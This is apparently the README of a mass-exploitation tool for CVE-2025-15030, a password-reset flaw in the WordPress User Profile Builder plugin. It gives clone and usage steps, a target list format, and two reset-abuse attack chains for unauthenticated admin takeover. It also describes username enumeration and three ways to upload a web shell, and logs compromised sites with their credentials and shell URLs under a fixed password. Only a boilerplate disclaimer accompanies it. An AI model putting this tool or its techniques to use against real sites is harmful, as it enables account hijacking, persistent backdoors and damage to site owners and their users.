Share
## https://sploitus.com/exploit?id=FFB2D0A9-C96D-504E-9FDA-7DB533D17D3C
# CVE-2025-15030
User Profile Builder < 3.15.2 - Unauthenticated Arbitrary Password Reset
# CVE-2025-15030
### User Profile Builder โ€” Unauthenticated Password Reset โ†’ Admin Takeover + Shell Upload

```
 ____  _     _____      ____  ____  ____  ____        _  ____  ____ _____  ____
/   _\/ \ |\/  __/     /_   \/  _ \/_   \/ ___\      / \/ ___\/  _ \\__  \/  _ \
|  /  | | //|  \ _____  /   /| / \| /   /|    \_____ | ||    \| / \|  /  || / \|
|  \__| \// |  /_\____\/   /_| \_/|/   /_\___ |\____\| |\___ || \_/| _\  || \_/|
\____/\__/  \____\     \____/\____/\____/\____/      \_/\____/\____//____/\____/
```

![CVE](https://img.shields.io/badge/CVE-2025--15030-critical?style=flat-square&color=8B0000)
![CVSS](https://img.shields.io/badge/CVSS%203.1-9.8%20CRITICAL-red?style=flat-square)
![Plugin](https://img.shields.io/badge/User%20Profile%20Builder%20%3C%203.15.2-555?style=flat-square)
![Auth](https://img.shields.io/badge/Auth-None-brightgreen?style=flat-square)
![Python](https://img.shields.io/badge/Python-3.8%2B-3776AB?style=flat-square&logo=python)
![Author](https://img.shields.io/badge/By-Nxploited-00aa55?style=flat-square)

---

## โถ Vulnerability

| Field | Detail |
|---|---|
| **CVE** | CVE-2025-15030 |
| **CVSS** | **9.8 CRITICAL** โ€” `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H` |
| **ADP** | CISA-ADP |
| **Plugin** | User Profile Builder for WordPress |
| **Affected** | All versions **before 3.15.2** |
| **Auth** | **None required** |
| **Type** | Improper Password Reset โ€” Unauthenticated Account Takeover |
| **CWE** | CWE-640 ยท Weak Password Recovery Mechanism |

**Root Cause:**  
The Profile Builder plugin's password recovery flow (`action2=recover_password2`) does not properly validate the reset key or enforce token expiry. By submitting a crafted POST with a valid `password_recovery_nonce_field2` extracted from the reset page, an unauthenticated attacker can set a new password for any WordPress user โ€” including administrators โ€” knowing only their username. No email interaction or valid reset token is required.

---

## โท What the Tool Does

This tool implements **two independent attack chains** against each target, both followed by optional shell deployment:

```
โ”Œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”
โ”‚  CHAIN 1 ยท CORE  (wp-login native reset abuse)                    โ”‚
โ”‚                                                                    โ”‚
โ”‚  POST /wp-login.php?action=lostpassword  (trigger reset)          โ”‚
โ”‚  GET  /wp-login.php?action=rp&key=...    (follow reset link)      โ”‚
โ”‚  POST /wp-login.php?action=resetpass     (inject new password)    โ”‚
โ”‚  Enumerate usernames  โ†’  brute strict login  โ†’  verify /wp-admin/ โ”‚
โ”œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”ค
โ”‚  CHAIN 2 ยท PB  (Profile Builder reset-from-link)                  โ”‚
โ”‚                                                                    โ”‚
โ”‚  Load reset URLs from pb_reset_links.txt                          โ”‚
โ”‚  GET    โ†’  extract nonce + userData                    โ”‚
โ”‚  POST action2=recover_password2  โ†’  set new password              โ”‚
โ”‚  Strict login  โ†’  verify /wp-admin/ access                        โ”‚
โ”œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€๏ฟฝ๏ฟฝโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”ค
โ”‚  SHELL UPLOAD  (runs after any confirmed admin hit)               โ”‚
โ”‚                                                                    โ”‚
โ”‚  Method 1  โ†’  plugin-install.php upload  (Nxploited.zip)          โ”‚
โ”‚  Method 2  โ†’  REST API  /wp-json/wp/v2/plugins                    โ”‚
โ”‚  Method 3  โ†’  Plugin/Theme editor  (write Nx.php directly)        โ”‚
โ”‚  Verify    โ†’  GET /wp-content/plugins/Nxploited/Nx.php            โ”‚
โ”‚  Log       โ†’  scan_results/shells.txt                             โ”‚
โ””โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”˜
```

---

## โธ Setup

```bash
git clone https://github.com/Nxploited/CVE-2025-15030.git
cd CVE-2025-15030
pip install -r requirements.txt
```

**`requirements.txt`**
```
requests>=2.28.0
urllib3>=1.26.0
colorama>=0.4.6
rich>=13.0.0
```

Place `Nxploited.zip` in the **same directory** as the script to enable shell upload. The tool runs without it but shell deployment will be skipped.

---

## โน Usage

```bash
python3 CVE-2025-15030.py
```

### Prompts

```
Targets list file (one URL per line):            list.txt
Threads (concurrent sites) [5]:                  5
HTTP timeout (seconds) [10]:                     10
Output file for core wp-login reset successes:   scan_results/wp_login_reset_success.txt
Output file for Nxploited shells:                scan_results/shells.txt
Profile Builder reset links file (optional):     pb_reset_links.txt
```

> **Password** used for all reset and login attempts is fixed internally:
> ```
> Nxploited_adminSA
> ```

---

## โบ Input Files

### `list.txt` โ€” Targets (required)
```
https://target1.com
target2.com
http://target3.com/wordpress
```

### `pb_reset_links.txt` โ€” Profile Builder Reset Links (optional)

If you have captured password reset email links from Profile Builder, paste them here one per line. The tool will:
1. Load the reset page and extract `password_recovery_nonce_field2` + `userData`
2. Submit the new password via `action2=recover_password2`
3. Attempt strict admin login with the new credentials

```
https://target1.com/wp-login.php?action=rp&key=ABC123&login=admin
https://target2.com/?page_id=5&action=recover_password&key=XYZ&login=editor
```

---

## โป Username Enumeration

The tool automatically discovers WordPress usernames using three methods before attempting login:

| Method | Endpoint |
|---|---|
| Author redirect | `/?author=1` โ†’ `/?author=10` |
| REST API | `/wp-json/wp/v2/users` |
| Hostname heuristic | First label of domain name |
| Default fallback | `admin` always included |

---

## โผ Admin Verification

Every login attempt is strictly verified before writing results. The tool checks:

```
/wp-admin/index.php       โ†’  id="adminmenu", id="wpadminbar"
/wp-admin/users.php       โ†’  users.php indicator
/wp-admin/plugins.php     โ†’  plugins.php indicator
/wp-admin/plugin-install.php  โ†’  upload-plugin, plugin-install-tab
```

A result is only written to disk when **โ‰ฅ 3 admin markers** are confirmed.

---

## โฝ Shell Upload Methods

After a confirmed admin session the tool attempts three escalation methods in order:

| Method | Endpoint | Trigger |
|---|---|---|
| **Plugin Upload** | `/wp-admin/update.php?action=upload-plugin` | Uploads `Nxploited.zip` via install form |
| **REST API** | `/wp-json/wp/v2/plugins` | Direct ZIP POST |
| **Editor Write** | `/wp-admin/plugin-editor.php` | Writes `Nx.php` via file editor |

Shell verification: `GET /wp-content/plugins/Nxploited/Nx.php` โ†’ HTTP 200

---

## โพ Output Files

| File | Contents |
|---|---|
| `scan_results/wp_login_reset_success.txt` | Confirmed admin hits via CORE chain |
| `scan_results/shells.txt` | Deployed shell URLs with credentials |

### Format

**`wp_login_reset_success.txt`**
```
[2025-06-01T14:22:10] https://target.com | https://target.com/wp-login.php | account=admin  pass=Nxploited_adminSA
```

**`shells.txt`**
```
[2025-06-01 14:22:18] https://target.com - admin:Nxploited_adminSA - SHELL: https://target.com/wp-content/plugins/Nxploited/Nx.php
```

---

## โฟ Terminal Output Format

```
[host]  https://target.com
CORE: KEY=OK  , RESET=OK  , ACCESS=1   |
PB:   KEY=FAIL, RESET=FAIL, ACCESS=0   |
SHELL: OK       | LOGIN: https://target.com/wp-login.php
```

| Column | Meaning |
|---|---|
| `KEY` | Reset flow initiated successfully |
| `RESET` | New password accepted by server |
| `ACCESS` | Number of confirmed admin logins |
| `SHELL` | `OK` if `Nx.php` is confirmed live |

---

## โ“ซ Author

```
Nxploited (Khaled Alenazi)
GitHub   โ†’  https://github.com/Nxploited
Telegram โ†’  @KNxploited
```

[![GitHub](https://img.shields.io/badge/GitHub-Nxploited-181717?style=for-the-badge&logo=github)](https://github.com/Nxploited)
[![Telegram](https://img.shields.io/badge/Telegram-@KNxploited-2CA5E0?style=for-the-badge&logo=telegram)](https://t.me/KNxploited)

---

## โ“ฌ Disclaimer

```
FOR AUTHORIZED SECURITY RESEARCH AND EDUCATION ONLY.

The author bears zero responsibility for any use of this tool
against systems the operator does not own or have explicit
written permission to test.

Unauthorized use violates the CFAA, CMA, and equivalent laws
worldwide and may result in criminal prosecution.

You alone are responsible for your actions.
```

---

ยฉ 2025 Nxploited ยท User Profile Builder